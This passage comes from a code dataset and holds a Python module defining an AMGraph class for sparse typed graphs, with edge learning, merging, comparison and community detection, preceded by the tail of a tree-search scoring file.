Score:%s\"%(node.getid(), depth, visits, -exploitweight, -1e20))\n return -1e20\n\n\n if doprint:\n if parent is None:\n print(\"Node %s (Parent:%s, Depth:%s, Visits:%s): Exploit:%s Explore:%s Score:%s\"%(node.getid(), 'Head', depth, visits, -exploitweight, exploreconstant*explore, score))\n else:\n print(\"Node %s (Parent:%s, Depth:%s, Visits:%s): Exploit:%s Explore:%s Unique:%s Score:%s\"%(node.getid(), parent.getid(), depth, visits, -exploitweight, exploreconstant*explore, uniqval, score))\n return score\n\n\n\n#========================================================\n\n","sub_path":"SelectionRule.py","file_name":"SelectionRule.py","file_ext":"py","file_size_in_byte":3903,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
{"seq_id":"346762563","text":"#!/usr/bin/env python\n# -*- encoding: utf-8 -*-\n\nfrom typing import Optional, Dict, Tuple, Union, Set\nfrom copy import deepcopy\nfrom math import pow, sqrt\nimport time\nfrom threading import Lock\nimport networkx as nx\n\n\n# alias types\n#\nNodeType = str\n\"\"\" the type of a node \"\"\"\n\nNodeUid = str\n\"\"\" a node's unique identifier within the context of the node's type \"\"\"\n\nNodeId = Tuple[NodeType, NodeUid]\n\"\"\" the unique identifier of a node - the concatenation of its 
type and uid\"\"\"\n\nNodeKey = str\n\"\"\" json compliant unique identifier of a node used in hashes \"\"\"\n\nSourceId = NodeId\n\"\"\" unique identifier of the source node in a triple \"\"\"\n\nTargetId = NodeId\n\"\"\" unique identifier of the target node in a triple \"\"\"\n\nEdgeType = str\n\"\"\" the type of an edge \"\"\"\n\nEdgeUid = str\n\"\"\" an edge's unique identifier within the context of the edge's type \"\"\"\n\nEdgeExpired = float\n\"\"\" the timestamp when an edge has expired \"\"\"\n\nEdgeId = Tuple[EdgeType, Optional[EdgeUid], Optional[EdgeExpired]]\n\"\"\" the unique identifier of an edge within the context of the edge type - a concatenation of Edge type, uid, expired timestamp\"\"\"\n\nTripleId = Tuple[SourceId, EdgeId, TargetId]\n\"\"\" the unique identifier of a triple source node, edge and target node \"\"\"\n\nTripleKey = str\n\"\"\" json compliant unique identifier of a triple used in hashes \"\"\"\n\nPor = dict\n\"\"\" dictionary representing the path of reasoning \"\"\"\n\n\ndef get_node_key(node_id: NodeId) -> NodeKey:\n # ':' special - enables easy splitting of keys to create ids\n #\n return f'{node_id[0]}:{node_id[1]}'\n\n\ndef get_node_id(node_key: NodeKey) -> NodeId:\n # assumes ':' delimits type and uid\n #\n node = node_key.split(':')\n return node[0], node[1]\n\n\ndef get_triple_key(triple_id: TripleId, directional: bool = False) -> TripleKey:\n source_key = get_node_key(node_id=triple_id[0])\n target_key = get_node_key(node_id=triple_id[2])\n\n # if not directional then key will consist of alphanumeric sort of source_key and target_key\n # note ':' special - delimits all components and allows for easy splitting to derive equivalent id\n #\n if (not directional and source_key < target_key) or directional:\n triple_key = f'{source_key}:{triple_id[1][0]}:{triple_id[1][1]}:{triple_id[1][2]}:{target_key}'\n else:\n triple_key = f'{target_key}:{triple_id[1][0]}:{triple_id[1][1]}:{triple_id[1][2]}:{source_key}'\n return triple_key\n\n\ndef get_triple_id(triple_key: TripleKey) -> TripleId:\n # assume special ':' character delimits components\n #\n triple = triple_key.split(':')\n\n # Note have to deal with converting string 'None' to type None\n #\n return (triple[0], triple[1]), (triple[2], triple[3] if triple[3] != 'None' else None, float(triple[4]) if triple[4] != 'None' else None), (triple[5], triple[6])\n\n\nclass AMGraph(object):\n \"\"\"\n class to represent a sparse graph of nodes connected by edges\n \"\"\"\n\n # class attribute representing next unique identifier for an instance of AMGraph\n # with associated thread lock\n #\n _next_uid = None\n _uid_lock = Lock()\n\n def __init__(self, uid: Optional[str] = None, graph=None, directional: bool = True, uid_copy: bool = True, normalised: bool = False):\n \"\"\"\n AMGraph represents a sparse graph of nodes connected via edges and capable of performing graph comparisons, learning and merging\n :param uid: optional unique identifier of a graph, if None then autogenerated\n :param graph: optional AMGraph or Dict that will be copied\n :param directional: Boolean flag indicating if edges are directional\n :param uid_copy: Boolean flag indicating if uid of supplied graph should be copied\n :param normalised: Boolean flag indicating edges of graph are normalised\n \"\"\"\n\n # the edges keyed by TripleKey\n #\n self.edges: dict = {}\n\n # the nodes keyed by NodeKey\n #\n self.nodes: dict = {}\n\n self.directional = directional\n self.normalised = normalised\n\n # dict of NodeKeys with attributes that are 
graphs\n #\n self.embedded_graphs = {}\n\n self.edgeTypes = set()\n\n self.uid = None\n\n if graph is not None:\n if isinstance(graph, AMGraph):\n self.edges = deepcopy(graph.edges)\n self.nodes = deepcopy(graph.nodes)\n self.embedded_graphs = deepcopy(graph.embedded_graphs)\n self.normalised = graph.normalised\n self.directional = graph.directional\n self.edgeTypes = deepcopy(graph.edgeTypes)\n if uid_copy:\n self.uid = graph.uid\n\n elif isinstance(graph, dict):\n self.edges = deepcopy(graph['edges'])\n self.nodes = deepcopy(graph['nodes'])\n self.directional = graph['directional']\n self.embedded_graphs = deepcopy(graph['embedded_graphs'])\n self.normalised = graph['normalised']\n self.edgeTypes = deepcopy(graph['edgeTypes'])\n\n if uid_copy:\n self.uid = graph['uid']\n\n # reconstruct any embedded graphs\n #\n for node_key in self.embedded_graphs:\n for attr in self.embedded_graphs[node_key]:\n self.nodes[node_key][attr] = AMGraph(graph=self.nodes[node_key][attr])\n\n # set the uid if provided\n #\n if uid is not None:\n self.uid = uid\n\n # else if graph has not been provided to copy or copy_uid is not required\n #\n if self.uid is None:\n\n # if the class next_uid is None then start from 1\n #\n with AMGraph._uid_lock:\n\n # set to 1 if never been set before\n #\n if AMGraph._next_uid is None:\n AMGraph._next_uid = 1\n\n # create standard uid\n #\n self.uid = f'_graph_{AMGraph._next_uid}'\n\n # increment for next graphs\n #\n AMGraph._next_uid += 1\n\n def to_dict(self, denormaliser=None) -> dict:\n \"\"\"\n represents the graph as a dictionary\n :return: dictionary with keys: nodes, edges, edgeTypes, directional, normalised, uid, embedded_graphs, amgraph\n \"\"\"\n graph_dict = {'nodes': deepcopy(self.nodes),\n 'edges': deepcopy(self.edges),\n 'edgeTypes': deepcopy(self.edgeTypes),\n 'directional': self.directional,\n 'normalised': self.normalised,\n 'uid': self.uid,\n 'embedded_graphs': deepcopy(self.embedded_graphs),\n 'amgraph': True}\n\n for node_key in self.embedded_graphs:\n for attr in self.embedded_graphs[node_key]:\n if denormaliser is not None:\n graph_dict['nodes'][node_key][attr] = denormaliser.denormalise(graph=graph_dict['nodes'][node_key][attr]).to_dict(denormaliser=denormaliser)\n graph_dict['normalised'] = False\n else:\n graph_dict['nodes'][node_key][attr] = graph_dict['nodes'][node_key][attr].to_dict()\n\n return graph_dict\n\n def set_node(self,\n node: Union[NodeKey, NodeId],\n timestamp: Optional[float] = None,\n **node_attributes) -> NodeKey:\n \"\"\"\n creates the node if it does not exist, else updates its timestamp and attributes; attributes that are AMGraphs are tracked as embedded graphs; returns the NodeKey\n \"\"\"\n\n if isinstance(node, tuple):\n node_key = get_node_key(node_id=node)\n node_id = node\n else:\n node_key = node\n node_id = get_node_id(node_key=node)\n\n if timestamp is None:\n ts = time.time()\n else:\n ts = timestamp\n\n if node_key not in self.nodes:\n self.nodes[node_key] = {'_type': node_id[0],\n '_uid': node_id[1],\n '_created': ts,\n '_updated': None,\n '_edges': set(),\n '_community': None,\n '_changed': False}\n\n else:\n self.nodes[node_key]['_updated'] = ts\n self.nodes[node_key]['_changed'] = True\n\n if len(node_attributes) > 0:\n self.nodes[node_key].update(**node_attributes)\n\n # keep track of any attributes that are embedded graphs\n #\n for attr in node_attributes:\n if isinstance(node_attributes[attr], AMGraph):\n if node_key not in self.embedded_graphs:\n self.embedded_graphs[node_key] = {attr}\n else:\n self.embedded_graphs[node_key].add(attr)\n\n return node_key\n\n def set_edge(self,\n triple: Union[TripleKey, TripleId],\n source_attr: Optional[dict] = None,\n target_attr: Optional[dict] = None,\n prob: float = 1.0,\n numeric: Optional[float] = 
None,\n audit: bool = False,\n timestamp: Optional[float] = None,\n **edge_attributes\n ):\n\n if timestamp is None:\n ts = time.time()\n else:\n ts = timestamp\n\n if isinstance(triple, tuple):\n triple_id = triple\n triple_key = get_triple_key(triple_id=triple, directional=self.directional)\n else:\n triple_id = get_triple_id(triple_key=triple)\n triple_key = triple\n\n # keep track of edge types\n #\n self.edgeTypes.add(triple_id[1][0])\n\n # add nodes if necessary\n #\n if source_attr is not None:\n source_key = self.set_node(node=triple_id[0], timestamp=ts, **source_attr)\n else:\n source_key = self.set_node(node=triple_id[0], timestamp=ts)\n\n if target_attr is not None:\n target_key = self.set_node(node=triple_id[2], timestamp=ts, **target_attr)\n else:\n target_key = self.set_node(node=triple_id[2], timestamp=ts)\n\n if audit and triple_key in self.edges:\n\n # construct an expired triple_id\n #\n expired_triple_id = (triple_id[0], (triple_id[1][0], triple_id[1][1], ts), triple_id[2])\n expired_edge_key = get_triple_key(triple_id=expired_triple_id, directional=self.directional)\n\n # copy over attributes\n #\n self.edges[expired_edge_key] = deepcopy(self.edges[triple_key])\n\n # update the attributes\n #\n self.edges[expired_edge_key]['_changed'] = True\n self.edges[expired_edge_key]['_updated'] = ts\n self.edges[expired_edge_key]['_expired'] = ts\n add_new_edge = True\n\n elif triple_key in self.edges:\n\n add_new_edge = False\n\n # update the attributes\n #\n self.edges[triple_key]['_updated'] = ts\n self.edges[triple_key]['_changed'] = True\n self.edges[triple_key]['_prob'] = prob\n\n if numeric is not None:\n self.edges[triple_key]['_numeric'] = numeric\n\n if len(edge_attributes) > 0:\n self.edges[triple_key].updated(**edge_attributes)\n else:\n add_new_edge = True\n\n # add new edge if required\n #\n if add_new_edge:\n self.edges[triple_key] = {'_type': triple_id[1][0],\n '_uid': triple_id[1][1],\n '_source': source_key,\n '_target': target_key,\n '_prob': prob,\n '_numeric': numeric,\n '_created': ts,\n '_updated': None,\n '_expired': None,\n '_changed': False}\n\n if len(edge_attributes) > 0:\n self.edges[triple_key].update(**edge_attributes)\n\n # add edge to nodes\n #\n self.nodes[source_key]['_edges'].add(triple_key)\n if not self.directional:\n self.nodes[target_key]['_edges'].add(triple_key)\n\n return triple_key\n\n def remove_edge(self,\n triple: Union[TripleKey, TripleId],\n audit: bool = False):\n\n if isinstance(triple, tuple):\n triple_id = triple\n triple_key = get_triple_key(triple_id=triple, directional=self.directional)\n else:\n triple_id = get_triple_id(triple_key=triple)\n triple_key = triple\n\n if triple_key in self.edges:\n\n if audit:\n ts = time.time()\n\n # construct an expired triple_id\n #\n expired_triple_id = (triple_id[0], (triple_id[1][0], triple_id[1][1], ts), triple_id[2])\n expired_edge_key = get_triple_key(triple_id=expired_triple_id, directional=self.directional)\n\n self.edges[expired_edge_key] = deepcopy(self.edges[triple_key])\n self.edges[expired_edge_key]['_changed'] = True\n self.edges[expired_edge_key]['_updated'] = ts\n self.edges[expired_edge_key]['_expired'] = ts\n\n # remove edge from nodes\n #\n self.nodes[self.edges[triple_key]['_source']]['_edges'].discard(triple_key)\n if not self.directional:\n self.nodes[self.edges[triple_key]['_target']]['_edges'].discard(triple_key)\n \n # delete the edge\n #\n del self.edges[triple_key]\n\n # delete edgeType entry if all edges have been removed\n #\n if not audit and sum([1 for t_key in 
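# A rough sketch of the audit pattern set_edge/remove_edge implement above:
# before a live edge is overwritten or deleted, a copy is stored under a key
# that embeds the expiry timestamp, preserving history. Names are illustrative.
import time
from copy import deepcopy

edges = {('a', 'HAS_B', 'b'): {'_prob': 1.0, '_expired': None}}

def expire_edge(key):
    ts = time.time()
    expired_key = key + (ts,)              # fold the timestamp into the key
    edges[expired_key] = deepcopy(edges[key])
    edges[expired_key]['_expired'] = ts
    del edges[key]                         # live edge gone, audit copy remains

expire_edge(('a', 'HAS_B', 'b'))
print(edges)                               # only the timestamped audit copy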
self.edges if self.edges[t_key]['_type'] == triple_id[1][0]]) == 0:\n self.edgeTypes.discard(triple_id[1][0])\n\n def remove_node(self, node: Union[NodeKey, NodeId]):\n\n if isinstance(node, tuple):\n node_key = get_node_key(node_id=node)\n else:\n node_key = node\n\n if node_key in self.nodes:\n\n # first delete any edges node has\n #\n triple_keys = list(self.nodes[node_key]['_edges'])\n for triple_key in triple_keys:\n self.remove_edge(triple=triple_key, audit=False)\n\n del self.nodes[node_key]\n\n if node_key in self.embedded_graphs:\n del self.embedded_graphs[node_key]\n\n def compare_graph(self, graph_to_compare=None, compare_edge_types: Optional[Set[EdgeType]] = None) -> Tuple[float, Por]:\n\n distance: float = 0.0\n numeric_dist: float\n prob_dist: float\n\n por: Por = {}\n\n # if graph_to_compare is None then set to an empty graph\n #\n if graph_to_compare is None:\n graph_to_compare = AMGraph()\n\n if compare_edge_types is not None:\n\n # get the edges to compare - ie the edge type is in compare_edge_types and edge is not expired\n #\n triples_to_compare = ({triple_key\n for triple_key in self.edges\n if self.edges[triple_key]['_type'] in compare_edge_types and self.edges[triple_key]['_expired'] is None} |\n {triple_key\n for triple_key in graph_to_compare.edges\n if graph_to_compare.edges[triple_key]['_type'] in compare_edge_types and graph_to_compare.edges[triple_key]['_expired'] is None})\n else:\n triples_to_compare = ({triple_key\n for triple_key in self.edges\n if self.edges[triple_key]['_expired'] is None} |\n {triple_key\n for triple_key in graph_to_compare.edges\n if graph_to_compare.edges[triple_key]['_expired'] is None})\n\n for triple_key in triples_to_compare:\n\n # default numeric_dist in case edge numeric is None\n #\n numeric_dist = 0.0\n\n # if edge in both graphs\n #\n if triple_key in self.edges and triple_key in graph_to_compare.edges:\n prob_dist = abs(self.edges[triple_key]['_prob'] - graph_to_compare.edges[triple_key]['_prob'])\n\n if self.edges[triple_key]['_numeric'] is not None and graph_to_compare.edges[triple_key]['_numeric'] is not None:\n numeric_dist = abs(self.edges[triple_key]['_numeric'] - graph_to_compare.edges[triple_key]['_numeric'])\n\n # if edge only in this graph\n #\n elif triple_key in self.edges:\n prob_dist = self.edges[triple_key]['_prob']\n\n if self.edges[triple_key]['_numeric'] is not None:\n numeric_dist = self.edges[triple_key]['_numeric']\n\n # if edge only in graph_to_compare\n #\n else:\n prob_dist = graph_to_compare.edges[triple_key]['_prob']\n\n if graph_to_compare.edges[triple_key]['_numeric'] is not None:\n numeric_dist = graph_to_compare.edges[triple_key]['_numeric']\n\n por[triple_key] = {'prob': prob_dist, 'numeric': numeric_dist}\n\n distance += pow(prob_dist, 2)\n\n distance += pow(numeric_dist, 2)\n\n distance = sqrt(distance)\n\n return distance, por\n\n def learn_graph(self, graph_to_learn=None, learn_rate: float = 1.0, learn_edge_types: Optional[Set[EdgeType]] = None, prune_threshold: float = 0.1, audit: bool = False):\n\n # if graph_to_lean is None then set to an empty graph\n #\n if graph_to_learn is None:\n graph_to_learn = AMGraph()\n\n if learn_edge_types is not None:\n\n # get the edges to compare - ie the edge type is in compare_edge_types and edge is not expired\n #\n exist_triples_to_learn = {triple_key\n for triple_key in self.edges\n if self.edges[triple_key]['_type'] in learn_edge_types and self.edges[triple_key]['_expired'] is None}\n triples_to_learn = (exist_triples_to_learn |\n {triple_key\n for 
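# compare_graph above is a Euclidean distance over the union of non-expired
# edges, using _prob and _numeric as coordinates and treating a missing edge
# as zero on both. The same arithmetic with plain dicts of (prob, numeric):
from math import sqrt

def edge_distance(edges_a: dict, edges_b: dict) -> float:
    total = 0.0
    for key in set(edges_a) | set(edges_b):
        pa, na = edges_a.get(key, (0.0, 0.0))
        pb, nb = edges_b.get(key, (0.0, 0.0))
        total += (pa - pb) ** 2 + (na - nb) ** 2
    return sqrt(total)

a = {'t1': (1.0, 0.5), 't2': (0.8, 0.0)}
b = {'t1': (0.6, 0.5)}
print(edge_distance(a, b))                 # sqrt(0.4**2 + 0.8**2)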
triple_key in graph_to_learn.edges\n if graph_to_learn.edges[triple_key]['_type'] in learn_edge_types and graph_to_learn.edges[triple_key]['_expired'] is None})\n else:\n exist_triples_to_learn = {triple_key\n for triple_key in self.edges\n if self.edges[triple_key]['_expired'] is None}\n triples_to_learn = (exist_triples_to_learn |\n {triple_key\n for triple_key in graph_to_learn.edges\n if graph_to_learn.edges[triple_key]['_expired'] is None})\n\n # if no existing edges to learn then override learn rate to maximum (1.0)\n #\n if len(triples_to_learn) == 0:\n learn_rate = 1.0\n\n if audit:\n ts = time.time()\n else:\n ts = None\n\n triples_to_prune = set()\n\n for triple_key in triples_to_learn:\n\n # if edge in both graphs\n #\n if triple_key in self.edges and triple_key in graph_to_learn.edges:\n\n prob = self.edges[triple_key]['_prob'] + ((graph_to_learn.edges[triple_key]['_prob'] - self.edges[triple_key]['_prob']) * learn_rate)\n\n numeric = None\n\n if prob > prune_threshold:\n\n if self.edges[triple_key]['_numeric'] is not None and graph_to_learn.edges[triple_key]['_numeric'] is not None:\n numeric = self.edges[triple_key]['_numeric'] + ((graph_to_learn.edges[triple_key]['_numeric'] - self.edges[triple_key]['_numeric']) * learn_rate)\n\n self.set_edge(triple=triple_key, audit=audit, timestamp=ts, numeric=numeric, prob=prob)\n else:\n triples_to_prune.add(triple_key)\n\n # if edge only in this graph\n #\n elif triple_key in self.edges:\n\n prob = self.edges[triple_key]['_prob'] + ((0.0 - self.edges[triple_key]['_prob']) * learn_rate)\n\n numeric = None\n\n if prob > prune_threshold:\n\n if self.edges[triple_key]['_numeric'] is not None:\n numeric = self.edges[triple_key]['_numeric'] + ((0.0 - self.edges[triple_key]['_numeric']) * learn_rate)\n\n self.set_edge(triple=triple_key, audit=audit, timestamp=ts, numeric=numeric, prob=prob)\n else:\n triples_to_prune.add(triple_key)\n\n # if edge only in graph_to_learn\n #\n else:\n prob = (graph_to_learn.edges[triple_key]['_prob']) * learn_rate\n\n numeric = None\n\n if prob > prune_threshold:\n\n if graph_to_learn.edges[triple_key]['_numeric'] is not None:\n numeric = graph_to_learn.edges[triple_key]['_numeric'] * learn_rate\n\n self.set_edge(triple=triple_key, audit=audit, timestamp=ts, numeric=numeric, prob=prob)\n\n # now copy over triples not learnt and not expired\n #\n if learn_edge_types is not None:\n triples_to_copy = {triple_key\n for triple_key in graph_to_learn.edges\n if graph_to_learn.edges[triple_key]['_type'] not in learn_edge_types and graph_to_learn.edges[triple_key]['_expired'] is None}\n\n for triple_key in triples_to_copy:\n\n prob = graph_to_learn.edges[triple_key]['_prob'] * learn_rate\n\n if graph_to_learn.edges[triple_key]['_numeric'] is not None:\n numeric = graph_to_learn.edges[triple_key]['_numeric'] * learn_rate\n else:\n numeric = None\n\n self.set_edge(triple=triple_key, audit=audit, timestamp=ts, numeric=numeric, prob=prob)\n\n # now prune triples\n #\n for triple_key in triples_to_prune:\n self.remove_edge(triple=triple_key, audit=audit)\n\n def learn_edge(self, triple: Union[TripleKey, TripleId], learn_rate, numeric: Optional[float] = None, prune_threshold: float = 0.0, audit: bool = False) -> TripleKey:\n\n if isinstance(triple, tuple):\n triple_id = triple\n triple_key = get_triple_key(triple_id=triple, directional=self.directional)\n else:\n triple_id = get_triple_id(triple_key=triple)\n triple_key = triple\n\n source_key = get_node_key(node_id=triple_id[0])\n if source_key not in self.nodes:\n 
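# learn_graph's update rule above is a per-edge exponential moving average,
# new = old + (target - old) * learn_rate, with edges pruned once probability
# drops to the prune threshold. The bare recurrence:
def learn(old: float, target: float, learn_rate: float) -> float:
    return old + (target - old) * learn_rate

prob = 1.0
for _ in range(3):
    prob = learn(prob, 0.0, 0.7)   # target 0.0: the edge is absent elsewhere
    print(round(prob, 3))          # 0.3, 0.09, 0.027 -> eventually pruned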
self.set_edge(triple=triple, prob=1.0, numeric=numeric, audit=audit)\n else:\n triples_to_process = {existing_triple_key\n for existing_triple_key in self.nodes[source_key]['_edges']\n if self.edges[existing_triple_key]['_type'] == triple_id[1][0] and self.edges[existing_triple_key]['_expired'] is None}\n\n triples_to_process.add(triple_key)\n triples_to_prune = set()\n\n for triple_key_to_process in triples_to_process:\n if triple_key_to_process != triple_key:\n\n # weaken the probability of this edge and reduce numeric closer to 0.0\n #\n existing_prob = self.edges[triple_key_to_process]['_prob'] + ((0.0 - self.edges[triple_key_to_process]['_prob']) * learn_rate)\n\n if existing_prob > prune_threshold:\n if self.edges[triple_key_to_process]['_numeric'] is not None:\n existing_numeric = self.edges[triple_key_to_process]['_numeric'] + ((0.0 - self.edges[triple_key_to_process]['_numeric']) * learn_rate)\n else:\n existing_numeric = None\n\n self.set_edge(triple=triple_key_to_process, prob=existing_prob, numeric=existing_numeric, audit=audit)\n\n else:\n triples_to_prune.add(triple_id)\n\n else:\n if triple_key_to_process in self.edges:\n new_prob = self.edges[triple_key_to_process]['_prob'] + ((1.0 - self.edges[triple_key_to_process]['_prob']) * learn_rate)\n if numeric is not None and self.edges[triple_key_to_process]['_numeric'] is not None:\n new_numeric = self.edges[triple_key_to_process]['_numeric'] + ((numeric - self.edges[triple_key_to_process]['_numeric']) * learn_rate)\n else:\n new_numeric = numeric\n else:\n\n # if there are more than 1 in triples_to_process this means edges for the correct type already exist and prob = learn_rate\n #\n if len(triples_to_process) > 1:\n new_prob = learn_rate\n if numeric is not None:\n new_numeric = numeric * learn_rate\n else:\n new_numeric = None\n\n # else probability needs to start from 1.0\n #\n else:\n new_prob = 1.0\n new_numeric = numeric\n\n self.set_edge(triple=triple_key_to_process, prob=new_prob, numeric=new_numeric, audit=audit)\n # now prune triples\n #\n for triple_key in triples_to_prune:\n self.remove_edge(triple=triple_key, audit=audit)\n\n return triple_key\n\n def merge_graph(self, graph_to_merge, weight: float = 1.0, audit: bool = False):\n\n triples_to_merge = {triple_key\n for triple_key in graph_to_merge.edges\n if graph_to_merge.edges[triple_key]['_expired'] is None}\n\n if audit:\n ts = time.time()\n else:\n ts = None\n\n for triple_key in triples_to_merge:\n\n # if edge in both graphs\n #\n if triple_key in self.edges and triple_key in graph_to_merge.edges:\n\n prob = self.edges[triple_key]['_prob'] + (graph_to_merge.edges[triple_key]['_prob'] * weight)\n\n numeric = None\n\n if self.edges[triple_key]['_numeric'] is not None and graph_to_merge.edges[triple_key]['_numeric'] is not None:\n numeric = self.edges[triple_key]['_numeric'] + (graph_to_merge.edges[triple_key]['_numeric'] * weight)\n\n self.set_edge(triple=triple_key, audit=audit, timestamp=ts, numeric=numeric, prob=prob)\n\n # if edge only in this graph\n #\n elif triple_key in graph_to_merge.edges:\n\n prob = (graph_to_merge.edges[triple_key]['_prob']) * weight\n\n numeric = None\n\n if graph_to_merge.edges[triple_key]['_numeric'] is not None:\n numeric = graph_to_merge.edges[triple_key]['_numeric'] * weight\n\n self.set_edge(triple=triple_key, audit=audit, timestamp=ts, numeric=numeric, prob=prob)\n\n def diff_graph(self, graph_to_diff):\n\n for triple_key in graph_to_diff.edges:\n if triple_key in self.edges:\n if graph_to_diff.edges[triple_key]['_numeric'] 
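# learn_edge above is a winner-take-most rule: the observed edge is pulled
# towards probability 1.0 while competing edges of the same type from the same
# source decay towards 0.0. Sketch with a plain dict (names illustrative):
def reinforce(probs: dict, winner: str, learn_rate: float) -> None:
    for key in probs:
        target = 1.0 if key == winner else 0.0
        probs[key] += (target - probs[key]) * learn_rate

probs = {'n1->n2': 0.5, 'n1->n3': 0.5}
reinforce(probs, 'n1->n2', 0.7)
print(probs)                       # {'n1->n2': 0.85, 'n1->n3': 0.15}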
is not None:\n if self.edges[triple_key]['_numeric'] is not None:\n self.edges[triple_key]['_numeric'] = self.edges[triple_key]['_numeric'] - graph_to_diff.edges[triple_key]['_numeric']\n else:\n self.edges[triple_key]['_numeric'] = -graph_to_diff.edges[triple_key]['_numeric']\n elif graph_to_diff.edges[triple_key]['_numeric'] is not None:\n self.set_edge(triple=triple_key, numeric=-graph_to_diff.edges[triple_key]['_numeric'])\n\n def rename_triples(self, postfix_edge_uid=None):\n\n for exist_triple_key in list(self.edges):\n\n exist_triple_id = get_triple_id(triple_key=exist_triple_key)\n new_triple = deepcopy(self.edges[exist_triple_key])\n\n new_triple['_uid'] = f'{new_triple[\"_uid\"]}_{postfix_edge_uid}'\n new_triple_id = (exist_triple_id[0], (new_triple['_type'], new_triple['_uid'], new_triple['_expired']), exist_triple_id[2])\n new_triple_key = get_triple_key(triple_id=new_triple_id, directional=self.directional)\n\n del self.edges[exist_triple_key]\n self.edges[new_triple_key] = new_triple\n\n self.nodes[new_triple['_source']]['_edges'].discard(exist_triple_key)\n self.nodes[new_triple['_source']]['_edges'].add(new_triple_key)\n if not self.directional:\n self.nodes[new_triple['_target']]['_edges'].discard(exist_triple_key)\n self.nodes[new_triple['_target']]['_edges'].add(new_triple_key)\n\n def get_sub_graphs(self, generalise: bool = False):\n sub_graphs = []\n if self.directional:\n for node_key in self.nodes:\n if len(self.nodes[node_key]['_edges']) > 0:\n graph = AMGraph(directional=True)\n\n if generalise:\n source_id = (self.nodes[node_key]['_type'], '*')\n else:\n source_id = (self.nodes[node_key]['_type'], self.nodes[node_key]['_uid'])\n\n for edge_key in self.nodes[node_key]['_edges']:\n edge_id = (self.edges[edge_key]['_type'], self.edges[edge_key]['_uid'], self.edges[edge_key]['_expired'])\n target_id = (self.nodes[self.edges[edge_key]['_target']]['_type'], self.nodes[self.edges[edge_key]['_target']]['_uid'])\n graph.set_edge(triple=(source_id, edge_id, target_id),\n prob=self.edges[edge_key]['_prob'],\n numeric=self.edges[edge_key]['_numeric'])\n sub_graphs.append((self.nodes[node_key]['_type'], graph))\n\n return sub_graphs\n\n def calc_communities(self, community_edge_type: EdgeType, weight_field='_numeric', inverse=False):\n if len(self.edges) > 1:\n nx_graph = nx.MultiGraph()\n distances = [self.edges[triple_key][weight_field] for triple_key in self.edges if self.edges[triple_key]['_type'] == community_edge_type]\n min_distance = min(distances)\n max_distance = max(distances)\n for triple_key in self.edges:\n if self.edges[triple_key]['_type'] == community_edge_type and self.edges[triple_key]['_expired'] is None:\n weight = (self.edges[triple_key][weight_field] - min_distance) / (max_distance - min_distance)\n if inverse:\n weight = 1 - weight\n nx_graph.add_edge(self.edges[triple_key]['_source'], self.edges[triple_key]['_target'], weight=weight)\n\n communities = list(nx.algorithms.community.greedy_modularity_communities(nx_graph, weight='weight'))\n for c_idx in range(len(communities)):\n for node_key in communities[c_idx]:\n self.nodes[node_key]['_community'] = c_idx\n\n\nif __name__ == '__main__':\n\n from src.normalise_amgraph import NormaliseAMGraph\n\n g1 = AMGraph(directional=True)\n g1.set_edge(triple=(('A', '1'), ('HAS_B', None, None), ('B', '2')), numeric=200)\n\n g1.remove_edge(triple=(('A', '1'), ('HAS_B', None, None), ('B', '2')), audit=False)\n\n g1.remove_node(node=('A', '1'))\n\n g1.remove_node(node=('B', '2'))\n\n g1.set_edge(triple=(('A', '1'), 
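# calc_communities above min-max normalises an edge attribute into [0, 1]
# (inverse=True flips it, so small distances become strong ties) and hands the
# weighted graph to networkx's greedy modularity detection. Standalone sketch:
import networkx as nx

raw = [('a', 'b', 1.0), ('b', 'c', 1.5), ('c', 'd', 9.0), ('d', 'e', 9.5)]
lo = min(w for _, _, w in raw)
hi = max(w for _, _, w in raw)

g = nx.Graph()
for u, v, w in raw:
    g.add_edge(u, v, weight=1 - (w - lo) / (hi - lo))   # inverted weight

communities = nx.algorithms.community.greedy_modularity_communities(g, weight='weight')
print([sorted(c) for c in communities])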
('HAS_B', None, None), ('B', '2')), numeric=200, audit=True)\n\n    g1.set_edge(triple=(('A', '1'), ('HAS_B', None, None), ('B', '2')), numeric=400, audit=True)\n\n    g1.remove_edge(triple=(('A', '1'), ('HAS_B', None, None), ('B', '2')), audit=True)\n\n    g2 = AMGraph(directional=False)\n\n    g2.set_edge(triple=(('A', '1'), ('HAS_B', None, None), ('B', '2')), numeric=200)\n\n    g2.remove_edge(triple=(('A', '1'), ('HAS_B', None, None), ('B', '2')), audit=False)\n\n    g2.remove_node(node=('A', '1'))\n\n    g2.remove_node(node=('B', '2'))\n\n    g2.set_edge(triple=(('A', '1'), ('HAS_B', None, None), ('B', '2')), numeric=200, audit=True)\n\n    g2.set_edge(triple=(('A', '1'), ('HAS_B', None, None), ('B', '2')), numeric=400, audit=True)\n\n    g2.remove_edge(triple=(('A', '1'), ('HAS_B', None, None), ('B', '2')), audit=True)\n\n    g3 = AMGraph(directional=True)\n\n    g3.set_edge(triple=(('TRADE', '*'), ('HAS_PLATFORM', None, None), ('PLATFORM', 'A')))\n    g3.set_edge(triple=(('TRADE', '*'), ('HAS_DATE', None, None), ('DATE', '22-11-66')))\n    g3.set_edge(triple=(('TRADE', '*'), ('HAS_VOLUME', None, None), ('VOLUME', 'TRADE')), numeric=100)\n\n    g4 = AMGraph(directional=True)\n\n    g4.set_edge(triple=(('TRADE', '*'), ('HAS_PLATFORM', None, None), ('PLATFORM', 'A')))\n    g4.set_edge(triple=(('TRADE', '*'), ('HAS_DATE', None, None), ('DATE', '22-11-66')))\n    g4.set_edge(triple=(('TRADE', '*'), ('HAS_VOLUME', None, None), ('VOLUME', 'TRADE')), numeric=200)\n\n    normaliser = NormaliseAMGraph()\n    g3n, new_min_max = normaliser.normalise(graph=g3)\n    g4n, new_min_max = normaliser.normalise(graph=g4)\n\n    distance = g3n.compare_graph(graph_to_compare=g4n)\n\n    g3n1 = AMGraph(graph=g3n)\n\n    g3n1.learn_graph(graph_to_learn=g4n, learn_rate=0.7)\n    g3n1d = normaliser.denormalise(graph=g3n1)\n\n    g3n1.learn_graph(graph_to_learn=g4n, learn_rate=0.7)\n    g3n1d = normaliser.denormalise(graph=g3n1)\n\n    g5 = AMGraph()\n    g5.merge_graph(graph_to_merge=g3n, weight=0.5)\n    g5d = normaliser.denormalise(graph=g5)\n\n    g5.merge_graph(graph_to_merge=g4n, weight=0.5)\n    g5d = normaliser.denormalise(graph=g5)\n\n    g6 = AMGraph()\n    g6.learn_edge(triple=(('NEURON', '1'), ('NN', None, None), ('NEURON', '2')), learn_rate=0.7)\n    g6.learn_edge(triple=(('NEURON', '1'), ('NN', None, None), ('NEURON', '2')), 